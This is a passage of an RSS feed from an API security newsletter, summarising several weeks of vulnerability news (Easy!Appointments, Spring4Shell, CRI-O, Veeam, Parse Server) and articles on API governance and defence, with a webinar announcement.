<li>How are these APIs to be tested from a security perspective?</li>
<li>How to use standard libraries and patterns for authorization code? There is a danger of excessive code duplication if every Lambda has to implement the same method.</li>
<li>How can runtime protections (API firewalls or WAAPs) be included in front of such APIs? Security is now totally reliant on the integrity of the backing Lambda code.</li>
</ul>
<p>The drive toward serverless is likely to drive new API deployment architectures, such as these Lambda Function URLs. However, a savvy security team should ensure all new risk vectors are considered.</p>
<p>The post <a href="https://apisecurity.io/issue-181-vulnerability-wavlink-router-api-exposing-system-passwords-views-internal-apis/">Issue 181: Vulnerability in Wavlink router, API exposing system passwords, views on internal APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 180: API vulnerability in Easy!Appointments platform, new APIs compromising security</title>
		<link>https://apisecurity.io/issue-180-api-vulnerability-in-easyappointments-platform-new-apis-compromising-security/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 13 Apr 2022 15:17:36 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9427</guid>

					<description><![CDATA[<p>This week, we have news of an API vulnerability in the scheduling platform Easy!Appointments allowing unauthorized access. We also have articles on whether the growth in APIs compromises security, how API traffic visibility is a key for API security, and some basic tips on locking down APIs to improve security. Vulnerability: API access control vulnerability [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-180-api-vulnerability-in-easyappointments-platform-new-apis-compromising-security/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-180-api-vulnerability-in-easyappointments-platform-new-apis-compromising-security/">Issue 180: API vulnerability in Easy!Appointments platform, new APIs compromising security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of an API vulnerability in the scheduling platform Easy!Appointments allowing unauthorized access. We also have articles on whether the growth in APIs compromises security, how API traffic visibility is a key for API security, and some basic tips on locking down APIs to improve security.</p>
<h2>Vulnerability: API access control vulnerability in scheduling platform Easy!Appointments</h2>
<p>This week, we have <a href="https://portswigger.net/daily-swig/access-control-vulnerability-in-easy-appointments-platform-exposed-sensitive-personal-data" target="_blank" rel="noopener noreferrer">an API vulnerability in the open-source scheduling platform Easy!Appointments</a>, courtesy of The Daily Swig. The vulnerability was discovered by security researcher Francesco Carlucci, and it is tracked as <a href="https://nvd.nist.gov/vuln/detail/CVE-2022-0482" target="_blank" rel="noopener noreferrer">CVE-2022-048</a>, with a CVSS score of 9.1.</p>
<p>Carlucci discovered that the method <code>ajax_get_calendar_events()</code> passed three parameters – <code>startDate</code>, <code>endDate</code>, <code>csrfToken</code> – and no authentication tokens or headers. Unfortunately, he also found that it was possible to obtain a suitable CSRF token simply by visiting the website&#8217;s public bookings form, capturing the token with the browser developer tools, and then submitting this on the unprotected API. This simple attack could allow an attacker to query all calendar data, including any PII of users included in the bookings.</p>
<p>Carlucci also commented that the Easy!Appointments used a PHP framework <code>CodeIgniter</code> which did not include built-in support for authentication of API endpoints, forcing users to implement their own authentication. Unfortunately, it is all too easy to omit this during development, as was the case here. Best practice would be to use standard authentication middleware, such as that provided by frameworks like <code>Laravel</code>.</p>
<p>Carlucci submitted his discovery through the bug bounty platform Huntr and directly to the application developer. A patched version of the platform, <code>v1.4.3</code>, was released on 8 March, and users are advised to update to this version, or to use a patching script provided by the developer.</p>
<h2>Article: Are new APIs compromising security?</h2>
<p>An age-old conundrum for enterprises is how to balance business agility driven by innovation against the security risks that may be created by this fast-paced innovation. Nowhere is this more acutely felt than with APIs, <a href="https://www.toolbox.com/it-security/application-security/guest-article/new-apis-compromising-security/" target="_blank" rel="noopener noreferrer">as discussed in our first article this week</a>.</p>
<p>APIs are increasingly an essential element of digital transformation, enabling the integration of disparate systems to meet partner and customer needs. The growth of these APIs is widely regarded as growing exponentially. Unfortunately, this also poses a challenge from a security perspective due to an over-reliance on perimeter-based security controls, such as firewalls or network segmentation. APIs allow a direct end-to-end connection between a (potentially malicious) client and a data backend.</p>
<p>According to the author, a savvy enterprise should keep the following in mind with regard to API security:</p>
<ul>
<li>Although it is important to address API vulnerabilities (such as the OWASP API security Top 10), a focus should be given to flaws in business logic, too.</li>
<li>Maintaining an accurate and up-to-date API inventory is key to understanding the organization&#8217;s risk profile.</li>
<li>APIs can also be misused or abused by malicious actors, like in data mining or scraping — it&#8217;s not enough to merely prevent direct breaches through flaws.</li>
<li>Be wary of rogue actors within your partner or 3rd party organizations who have unfettered access to your APIs.</li>
</ul>
<h2>Article: Visibility is key for API security</h2>
<p>Next up this week is <a href="https://cyberprotection-magazine.com/api-security-the-new-north-south-east-and-west-of-cybersecurity" target="_blank" rel="noopener noreferrer">a quick read on the importance of API traffic visibility</a>, both in east-west and north-south directions. Traditionally, CISOs have focused on north-south traffic (that which connects to 3rd parties and external systems) and tended to neglect east-west traffic (internal traffic connecting internal systems).</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-9440" src="https://apisecurity.io/wp-content/uploads/2022/04/Article3-1.jpg" alt="" width="603" height="381" /></p>
<p>The author suggests that traditional security techniques based on network and endpoint protection which look for command/control, reconnaissance, lateral movement, and exfiltration are not suited for API security. APIs allow direct exposure of systems to a client and fly below the radar of traditional network and endpoint protection. API security solutions should provide monitoring of traffic across <em>all</em> compass points to properly protect against API threats.</p>
<h2>Article: Locking down APIs to improve security</h2>
<p>Our final item this week is another quick read on <a href="https://www.enterprisetimes.co.uk/2022/04/05/api-security-101-why-your-business-needs-to-lock-down-its-apis/" target="_blank" rel="noopener noreferrer">simple and practical steps for improving API security by locking down your APIs</a>.</p>
<p>The author reiterates the importance of maintaining an accurate and up-to-date inventory of the organization&#8217;s APIs to quantify risk and manage a security strategy, and goes on to suggest five key reasons why organizations are failing to address API security gaps:</p>
<ul>
<li><strong>Dangerously narrow view of API security</strong>: API security goes beyond pure vulnerability reduction and should embrace a broader definition that also covers abuse and misuse cases and complex business logic flaws.</li>
<li><strong>Exponential threat of an API breach</strong>: Due to the interconnected nature of APIs, the risk of a breach is exponential. A breach in one API may expose several connected systems.</li>
<li><strong>Flying blind in an ever-changing landscape</strong>: Without an accurate inventory of APIs, it is difficult to manage risk.</li>
<li><strong>Limited API security functionality with traditional tools</strong>: Traditional tools, such as WAFs and SAST/DAST, typically do not work well with APIs.</li>
<li><strong>Confusion around ownership</strong>: Multiple teams are involved with the development of APIs, and this creates confusion as to who is ultimately responsible for API security.</li>
</ul>
<p>Keeping these five points in mind when planning your API security is a long step towards more secure APIs and systems.</p>
<p>The post <a href="https://apisecurity.io/issue-180-api-vulnerability-in-easyappointments-platform-new-apis-compromising-security/">Issue 180: API vulnerability in Easy!Appointments platform, new APIs compromising security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 179: Spring4Shell zero-day, CRI-O container runtime vulnerability, and REST API security reference</title>
		<link>https://apisecurity.io/issue-179-spring4shell-zero-day-cri-o-container-runtime-vulnerability-and-rest-api-security-reference/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 06 Apr 2022 18:00:29 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9402</guid>

					<description><![CDATA[<p>This week, we have two new vulnerabilities: firstly, the big news in the Spring4Shell zero-day vulnerability in the Spring Framework coming hot on the heels of the recent Log4Shell vulnerability, and secondly, a vulnerability in the CRI-O container runtime that allowed host access to attackers. We also feature a guide to REST API security and [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-179-spring4shell-zero-day-cri-o-container-runtime-vulnerability-and-rest-api-security-reference/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-179-spring4shell-zero-day-cri-o-container-runtime-vulnerability-and-rest-api-security-reference/">Issue 179: Spring4Shell zero-day, CRI-O container runtime vulnerability, and REST API security reference</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have two new vulnerabilities: firstly, the big news in the <em>Spring4Shell</em> zero-day vulnerability in the Spring Framework coming hot on the heels of the recent <em>Log4Shell</em> vulnerability, and secondly, a vulnerability in the CRI-O container runtime that allowed host access to attackers. We also feature a guide to REST API security and an article on why API security is essential even if you are using an API gateway.</p>
<h2>Vulnerability: Spring4Shell zero-day vulnerability in Spring Framework</h2>
<p>Hot on the heels of the <em>log4shell</em> vulnerability in December 2021 <a href="https://portswigger.net/daily-swig/spring4shell-spring-users-face-new-zero-day-vulnerability" target="_blank" rel="noopener noreferrer">comes another shell vulnerability</a> — this time the affected component is Java-based Core module in the Spring Framework. The vulnerability has been dubbed <em>Spring4Shell/Springshell, </em>and it allowed unauthenticated attackers to trigger a remote code execution (RCE) on target systems. The vulnerability was first discovered by a researcher who posted some sample exploit code which has now been deleted.</p>
<p>The vulnerability has yet to be assigned a CVE but it has been acknowledged by Spring, who have announced the deployment of an emergency patch on Thursday last week in Spring Framework versions 5.3.18 and 5.2.20 through Maven Central. Although of concern as an RCE vulnerability, initial reports suggest this may not be as severe as the <em>log4shell</em> vulnerability due to the necessary preconditions for viable exploitation, namely Spring Framework versions 4.3.0 to 5.3.15, Apache Tomcat and JDK 9 or higher, and packaging as a traditional WAR instead of a JAR.</p>
<p>42Crunch covered this vulnerability this week in some depth to demonstrate <a href="https://42crunch.com/lessons-learned-from-the-spring4shell-vulnerability/" target="_blank" rel="noopener noreferrer">the benefits of a positive security model</a> toward the reduction of such high severity, zero-day vulnerabilities.</p>
<h2>Vulnerability: CRI-O Container Runtime allows attackers host access</h2>
<p>This week&#8217;s second vulnerability is in <a href="https://www.infoq.com/news/2022/03/container-runtime-vulnerability/" target="_blank" rel="noopener noreferrer">the CRI-O container runtime</a> used commonly in Kubernetes installation. The vulnerability, discovered by CrowdStrike researchers, allowed malicious users to gain root access to the underlying host and was rated 8.8 on the CVSS scoring system. The vulnerability has already been patched and users are urged to upgrade their systems.</p>
<p>Using the concept of <em>namespaces,</em> it is possible to set kernel parameters of individual containers and not affect the host itself — this is a standard safety mechanism to ensure only &#8220;safe&#8221; parameter changes are allowed. CRI-O version 1.19 introduced a feature that allowed users to override this setting and pass arbitrary parameters to the kernel using the parameter <code>kernel.core_pattern</code>. Unfortunately, this parameter was not validated, allowing an attacker to send arbitrary commands to the host.</p>
<p>This vulnerability is a timely reminder to ensure that hardening patterns and guidelines are applied to complex systems, such as Kubernetes.</p>
<h2>Guide: REST API security reference</h2>
<p>This week I am pleased to feature <a href="https://dzone.com/refcardz/rest-api-security-1" target="_blank" rel="noopener noreferrer">my reference card on REST API security</a>, courtesy of the team at DZone. The reference card is intended to be a quick start guide for developers tasked with developing APIs and needing to get a high-level overview of API security. The guide covers the following key topics:</p>
<ul>
<li>Introduction to API security</li>
<li>Foundations of API security</li>
<li>Secure API life cycle</li>
<li>Common API attack methods (and defenses)</li>
<li>Common vulnerabilities</li>
<li>Best practices for securing APIs</li>
</ul>
<p>I&#8217;m thankful to the team at DZone for the opportunity to work on this guide, and hope that this is a useful contribution to our community.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-9412" src="https://apisecurity.io/wp-content/uploads/2022/04/Article3.jpg" alt="" width="600" height="403" /></p>
<h2>Article: API gateways need to be supplemented by API security</h2>
<p>Finally this week,<a href="https://securityboulevard.com/2022/03/api-gateway-or-not-you-need-api-security/" target="_blank" rel="noopener noreferrer">we have views from Security Boulevard</a> on the need for dedicated API security solutions <em>in addition</em> to any API gateways already deployed — defense in depth is the best strategy for comprehensive API security.</p>
<p>API gateways are an essential piece of the API security puzzle, providing features such as:</p>
<ul>
<li>Inline proxy for control over APIs</li>
<li>Verifying identities associated with requests through credential and token validation</li>
<li>Routing of API calls to frontend endpoints and backend services</li>
<li>Metering of traffic through APIs using rate limiting and throttling</li>
<li>Additional logging and monitoring.</li>
</ul>
<p>Whilst all Cloud providers offer API gateway products, they all without exception recommend the use of additional API security products, such as WAFs, WAAPs, or API-specific security products. The fundamental difference between API gateways and API-specific tooling is that the former are operating on endpoints only and are schema-agnostic, whilst API-specific tools are able to inspect API traffic at the payload level. By inspecting API transactions at the schema and operation level, it is possible to restrict and limit data that does not conform to the specification (limiting mass assignment and excessive data exposure vulnerabilities) and restrict invalid operations (use of unknown HTTP verbs). This approach is the fundamental principle of the positive security model: only known good is permitted, and everything unknown is assumed bad and blocked.</p>
<p>A good read on the benefits of the positive security model and the value of a defense in depth approach.</p>
<p>The post <a href="https://apisecurity.io/issue-179-spring4shell-zero-day-cri-o-container-runtime-vulnerability-and-rest-api-security-reference/">Issue 179: Spring4Shell zero-day, CRI-O container runtime vulnerability, and REST API security reference</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 178: Six areas for Cloud-native security, API governance, DevOps for improved API security, locking down APIs</title>
		<link>https://apisecurity.io/issue-178-six-areas-for-cloud-native-security-api-governance-devops-for-improved-api-security-locking-down-apis/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 30 Mar 2022 15:38:28 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9370</guid>

					<description><![CDATA[<p>This week, we have articles covering six critical areas for cloud-native security in 2022, including of course API security. In addition there&#8217;s a beginner&#8217;s guide to API governance, thoughts on how to improve API security by embracing DevOps, and views on three ways to lock down APIs. Article: Six critical areas for cloud-native security in [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-178-six-areas-for-cloud-native-security-api-governance-devops-for-improved-api-security-locking-down-apis/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-178-six-areas-for-cloud-native-security-api-governance-devops-for-improved-api-security-locking-down-apis/">Issue 178: Six areas for Cloud-native security, API governance, DevOps for improved API security, locking down APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have articles covering six critical areas for cloud-native security in 2022, including of course API security. In addition there&#8217;s a beginner&#8217;s guide to API governance, thoughts on how to improve API security by embracing DevOps, and views on three ways to lock down APIs.</p>
<h2>Article: Six critical areas for cloud-native security in 2022</h2>
<p><a href="https://www.tripwire.com/state-of-security/security-data-protection/cloud/6-critical-areas-of-cloud-native-security-that-are-influential-in-2022/" target="_blank" rel="noopener noreferrer">First up this week is an article from Tripwire</a>, discussing six critical areas for cloud-native security in 2022 — no big surprise that API security is highlighted, along with supply chain security. The author views both of these new security concerns as closely related: your supply chain is exposed through APIs either to suppliers or 3rd parties. Understanding how to minimize this attack surface is key to reducing risk.</p>
<p>Supply chain vulnerabilities are increasingly common in today&#8217;s high-velocity digital world, where software is composed rather than written. Modern applications largely comprise of 3rd party components and libraries, and many services are provided by suppliers and 3rd parties. Weaknesses in this supply chain expose the organization to risk, because attackers may have access to both upstream and downstream elements of the chain. For example, they could inject malicious code, or exfiltrate sensitive data. Supply chain risk can be reduced by minimizing the scope of data and systems accessible by 3rd parties.</p>
<p>APIs are increasingly the conduit through which attacks can be made against organizations and their supply chains. The author recommends the following practices to minimize risk through this attack vector:</p>
<ul>
<li>API security should be addressed as early as possible in the development life cycle.</li>
<li>Since APIs are in many cases publicly accessible, security must be a priority.</li>
<li>API security should be automated within the software development life cycle to reduce human error and minimize developer effort.</li>
</ul>
<p>A timely article on the importance of both API and supply chain security, and well worth reading for a high-level view of cloud-native security.</p>
<h2>Article: Beginner&#8217;s guide to API governance</h2>
<p>Good API governance is a key element of a secure API portfolio, and this week Security Boulevard contribute <a href="https://securityboulevard.com/2022/03/a-beginners-guide-to-api-governance/" target="_blank" rel="noopener noreferrer">views on the core elements of good API governance</a>.</p>
<p>API governance is a set of principles by which APIs are designed, developed, and deployed, and typically include a standardized approach to API documentation, meeting specific security standards, and auditing across the API landscape.</p>
<p>The article recommends the following five key principles of API governance:</p>
<ul>
<li><strong>Consistency</strong>: APIs should be easy to use, use standardized data dictionaries and versioning, and be consistent in their endpoint and parameter naming convention.</li>
<li><strong>Predictability (managing complexity)</strong>: APIs should be &#8220;always-on&#8221;: focus on reliability, scalability, and maintainability.</li>
<li><strong>Security and compliance</strong>: Ensure you have visibility into your API estate, use a secure development process, perform security testing, and manage emerging threats.</li>
<li><strong>Interoperability (value and business alignment)</strong>: Ensure that your APIs are interoperable to ease adoption, and hence drive revenue returns.</li>
<li><strong>Quality API documentation system</strong>: Well-documented APIs are APIs that are easy to consume.</li>
</ul>
<p>The key takeaway here is that APIs may be unreliable, poorly documented, interoperate poorly, and — most importantly — be insecure without a proper governance process.</p>
<h2>Article: Security APIs at the speed of DevOps</h2>
<p><a href="https://devops.com/securing-apis-at-the-speed-of-devops/" target="_blank" rel="noopener noreferrer">DevOps.com provides their thoughts on why API security is increasingly important for organizations</a> that are embracing a fully automated DevOps development process. Although a DevOps process has many positive business benefits — such as faster time to market, improved efficiency, reduced costs, and improvements in quality — it is not without its challenges, particularly regarding security.</p>
<p>The authors cite two main challenges:</p>
<ul>
<li><strong>A fast development process</strong>: Reduced development cycle times mean that security testing becomes challenging, particularly if based on a manual process, such as a penetration testing. Shorter cycle times also mean that developers may introduce coding errors which result in vulnerable end products.</li>
<li><strong>Poor collaboration</strong>: Unless the development and operations teams (and indeed the security team) are collaborating smoothly using unified processes, it is possible there will be gaps or shortcomings on key topics, such as credential, token, and secret management.</li>
</ul>
<p>The article gives following recommendations to improve API security in a DevOps process:</p>
<ul>
<li>Integrate security tightly into the DevOps process and leverage automation heavily.</li>
<li>Protect APIs at runtime to ensure any vulnerabilities that are inadvertently introduced are mitigated until remediated in a subsequent release.</li>
<li>Embrace the cultural change that DevOps brings and cross-train developers to become security champions who take ownership of security considerations in their APIs.</li>
</ul>
<h2>Article: Three ways to lock down APIs</h2>
<p>Finally this week, we have the views of Pieter Danhieux — co-founder and CEO of Secure Code Warrior, a popular security learning platform — on <a href="https://www.scmagazine.com/perspective/devops/three-ways-to-lock-down-apis" target="_blank" rel="noopener noreferrer">three ways to lock down your APIs</a>.</p>
<p>Danhieux makes the point that API development is to some extent ungoverned and often overlooked by security teams, who may be more familiar with web application security. APIs are also frequently designed for bespoke functionality, and may be coded by developers who are not fully aware of security considerations.</p>
<p>Danhieux suggests the following three ways to lock down APIs:</p>
<ul>
<li><strong>Include tight identity controls for all APIs</strong>: Use well-provisioned role-based access controls to minimize scopes of API access, and ensure identities are actively managed.</li>
<li><strong>Tightly control the various calls made by APIs</strong>: Minimize the scope of API access to ensure that attackers are limited in their ability to traverse laterally in the event of a breach.</li>
<li><strong>Use a layered approach</strong>: Make sure that APIs have a precise context and purpose and do not expose excessive data. Compose APIs in layers to limit functionality to the minimum necessary.</li>
</ul>
<p>The article echoes many of the principles in our first story this week — sound advice for API designers.</p>
<p>The post <a href="https://apisecurity.io/issue-178-six-areas-for-cloud-native-security-api-governance-devops-for-improved-api-security-locking-down-apis/">Issue 178: Six areas for Cloud-native security, API governance, DevOps for improved API security, locking down APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 177: Vulnerabilities in Veeam product, RCE in Parse Server module, insecure API threat to mobile apps</title>
		<link>https://apisecurity.io/issue-177-vulnerabilities-in-veeam-product-rce-in-parse-server-module-insecure-api-threat-to-mobile-apps/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 23 Mar 2022 19:39:52 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9291</guid>

					<description><![CDATA[<p>This week, we have news of two critical vulnerabilities patched in the Veeam data backup solution, a remote code execution (RCE) vulnerability in the popular Parse Server API server module, views on how insecure APIs threaten mobile application security, and how attackers are increasingly focusing on APIs as the attack vector of choice. Vulnerability: Two [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-177-vulnerabilities-in-veeam-product-rce-in-parse-server-module-insecure-api-threat-to-mobile-apps/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-177-vulnerabilities-in-veeam-product-rce-in-parse-server-module-insecure-api-threat-to-mobile-apps/">Issue 177: Vulnerabilities in Veeam product, RCE in Parse Server module, insecure API threat to mobile apps</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of two critical vulnerabilities patched in the Veeam data backup solution, a remote code execution (RCE) vulnerability in the popular Parse Server API server module, views on how insecure APIs threaten mobile application security, and how attackers are increasingly focusing on APIs as the attack vector of choice.</p>
<h2>Vulnerability: Two critical vulnerabilities in Veeam data backup solution</h2>
<p>Veeam recently announced <a href="https://www.securityweek.com/critical-vulnerabilities-patched-veeam-data-backup-solution" target="_blank" rel="noopener noreferrer">two critical vulnerabilities</a> in their Backup and Replication product for backups of virtual environments. The vulnerabilities are tracked as CVE-2022-26500 and CVE-2022-26501, both with a CVSS score of 9.8, and could allow an attacker to remotely execute code. All versions of their product are affected but patches have already been released for versions 10 and 11. Users on version 9 are advised to upgrade to a supported version.</p>
<p>The Veeam product provides a remote access service on TCP port <code>9380</code> which unfortunately did not authenticate remote users. An attacker could use the remote access service to access internal APIs, including uploading and executing malicious code.</p>
<p>This is an all too familiar example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer">API2:2019 — Broken authentication</a> — always ensure that <em>all</em> API endpoints enforce authentication, even if they are only exposed on internal interfaces.</p>
<h2> Vulnerability: Remote code execution vulnerability in Parse Server module</h2>
<p><a href="https://portswigger.net/daily-swig/node-js-security-parse-server-remote-code-execution-vulnerability-resolved" target="_blank" rel="noopener noreferrer">This week&#8217;s second vulnerability</a> is also a remote code execution (RCE) vulnerability, this time in the popular Parse Server API server module for Node/Express applications. The vulnerability is tracked as CVE-2022-24760 and scores an (im)perfect 10 on the CVSS scale. All versions below 4.10.7 are impacted by this vulnerability, and users are advised to upgrade their package versions through the NPM package manager.</p>
<p>The vulnerability has its origins in a <a href="https://portswigger.net/daily-swig/prototype-pollution-the-dangerous-and-underrated-vulnerability-impacting-javascript-applications" target="_blank" rel="noopener noreferrer">prototype pollution</a> vulnerability that can allow RCE, cross-site scripting (XSS), and SQL injection attacks. In this case, the culprit was a function in the <code>DatabaseController.js</code> module and it affected MongoDB and PostgreSQL frameworks, although potentially <em>any</em> database backend could be impacted.</p>
<h2>Article: How the rise in APIs is creating risk in mobile applications</h2>
<p>We recently hosted <a href="https://42crunch.com/extend-protection-of-your-data-from-api-to-mobile-application/" target="_blank" rel="noopener noreferrer">a webinar on protecting mobile applications</a> and their APIs, and this week we have <a href="https://www.idevnews.com/stories/7515/Insecure-APIs-Threaten-Mobile-App-Security-What-To-Do-" target="_blank" rel="noopener noreferrer">views from Appdome on how APIs can expose mobile applications to risk</a>.</p>
<p>Recent research within banking, fintech, and cryptocurrency exchanges discovered that the majority of applications used hardcoded API keys or tokens. Additionally, the backend APIs allowed researchers to change PIN codes and transfer funds between accounts. Even if a perfectly secure mobile application were to be developed, end users would still be vulnerable to attacks due to insecurities in the backend API — a chain is only as strong as the weakest link.</p>
<p>The author highlights three main reasons for increasingly insecure APIs:</p>
<ul>
<li><strong>Proliferation and decentralized management of APIs</strong>: The numbers of APIs are growing at ever-increasing speeds, whilst simultaneously they are being developed in an ad-hoc or decentralized manner outside of standard controls and protections.</li>
<li><strong>Skill shortage for securing APIs</strong>: A proliferation of technologies and platforms poses an increased burden on technologists to maintain their skillsets.</li>
<li><strong>General-purpose AppSec tooling is not sufficient to protect APIs</strong>: APIs require specialist security testing tools, traditional AppSec tooling is <a href="https://thenewstack.io/application-security-tools-are-not-up-to-the-job-of-api-security/" target="_blank" rel="noopener noreferrer">not up to the job of securing APIs</a>.</li>
</ul>
<p>The author concludes that the number one way to address API security is through automation driving DevSecOps, in particular:</p>
<ul>
<li><strong>Understand desired security outcomes</strong>: Jointly agree on the desired security posture of the product.</li>
<li><strong>Shift security left</strong>: Developers must build API security in as early as possible in the API development cycle.</li>
<li><strong>Automate security implementation</strong>: Automate much of the security process to remove manual dependencies.</li>
<li><strong>Integrate into existing workflows</strong>: Take full advantage of automation, such as CI/CD systems.</li>
<li><strong>Verify and validate desired security outcomes instantly</strong>: Automatically check security postures.</li>
</ul>
<h2>Article: Attackers increasingly focused on APIs as an attack vector</h2>
<p>Finally this week, we have <a href="https://www.helpnetsecurity.com/2022/03/17/attackers-apis/" target="_blank" rel="noopener noreferrer">views on how APIs are becoming the preferred attack vector</a> for adversaries. Recent research indicates that nearly 70% of transactions were API transactions: the more transactions, the more opportunities to take advantage of.</p>
<p>The author identifies three emerging categories of attack, namely:</p>
<ul>
<li>Gift card fraud, loan fraud, and payment fraud</li>
<li>Commoditization of bots-as-a-service</li>
<li>Account takeover</li>
</ul>
<p>The key takeaway for API builders: &#8220;<cite>Attackers aren’t slowing down any time soon, and it’s time businesses match that rate of innovation.&#8221;</cite></p>
<h2>Webinar: Final session in OWASP API Security Top 10 Challenges</h2>
<p>This week, <a href="https://42crunch.com/owasp-api-security-top-10-webinar-series/" target="_blank" rel="noopener noreferrer">we have the final in the series of webinars</a> with Dr. Philippe De Ryck, Web Security Expert with Pragmatic Web Security.</p>
<p>Join us on Thursday, 24 March at 11 AM (EST) / 4 PM (GMT), as Philippe discusses the remaining topic in the OWASP API Security Top 10.</p>
<p>This promises to be a very useful session for anyone tasked with API development, as Philippe once again brings his considerable expertise and experience to the audience.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-9133" src="https://apisecurity.io/wp-content/uploads/2022/02/42C_S2_PWS_Webinars_600x300_S2.png" alt="" width="607" height="304" /></p>
<p>The post <a href="https://apisecurity.io/issue-177-vulnerabilities-in-veeam-product-rce-in-parse-server-module-insecure-api-threat-to-mobile-apps/">Issue 177: Vulnerabilities in Veeam product, RCE in Parse Server module, insecure API threat to mobile apps</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Webinar &#8211; OWASP API Security Top 10 Challenges  &#8211; Third and Final Episode</title>
		<link>https://apisecurity.io/owasp-api-security-top-10-challenges-webinar-series-2/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 23 Mar 2022 09:40:48 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9295</guid>

					<description><![CDATA[<p>&#160; March 24, 2022 &#8211; 11am EST / 4pm GMT &#160; In this third and final episode in the webinar series, Dr Philippe De Ryck, Web Security Expert with Pragmatic Web Security and Colin Domoney of 42Crunch and APISecurity.io. address one-by-one, the remaining 5 OWASP API Challenges: &#160; Issue 4: Lack of resources &#38; rate [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/owasp-api-security-top-10-challenges-webinar-series-2/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/owasp-api-security-top-10-challenges-webinar-series-2/">Webinar &#8211; OWASP API Security Top 10 Challenges  &#8211; Third and Final Episode</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://42crunch.com/owasp-api-security-top-10-webinar-series/"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-9013" src="https://apisecurity.io/wp-content/uploads/2022/01/42C_PWS_webinar.png" alt="" width="1928" height="1026" /></a></p>
<div>&nbsp;</div>
<div>March 24, 2022 &#8211; 11am EST / 4pm GMT</div>
<div>&nbsp;</div>
<div>In this third and final episode in the webinar series, Dr Philippe De Ryck, Web Security Expert with Pragmatic Web Security and Colin Domoney of 42Crunch and APISecurity.io. address one-by-one, the remaining 5 OWASP API Challenges:</div>
<div>&nbsp;</div>
<ul>
<li>Issue 4: Lack of resources &amp; rate limiting.</li>
<li>Issue 7: Security misconfiguration.</li>
<li>Issue 8: Injection.</li>
<li>Issue 9: Improper assets management.</li>
<li>Issue 10: Insufficient logging and monitoring.</li>
</ul>
<div>Through detailed practical examples and use cases, they guide developers and security professionals through how to fix and secure their APIs in the face of these identified threats.</div>
<div>
<p class="mt-4 mb-4 grey-out">Why attend?:</p>
<ul class="mt-4 mb-4 grey-out">
<li>APIs are the number one attack surface for hackers, learn how to protect your business today.</li>
<li>Industry leading API Security experts coach you how to improve the security posture of your APIs.</li>
<li>Guidance on how implementing security at design and run-time protects APIs throughout the lifecycle.</li>
</ul>
</div>
<p><a href="https://42crunch.com/owasp-api-security-top-10-webinar-series/">Register</a></p>
<p>The post <a href="https://apisecurity.io/owasp-api-security-top-10-challenges-webinar-series-2/">Webinar &#8211; OWASP API Security Top 10 Challenges  &#8211; Third and Final Episode</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 176: Case study of API vulnerabilities, Riverbed vulnerability, API abuse, JWT safety</title>
		<link>https://apisecurity.io/issue-176-case-study-api-vulnerabilities-riverbed-vulnerability-api-abuse-jwt-safety/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 16 Mar 2022 18:59:40 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9266</guid>

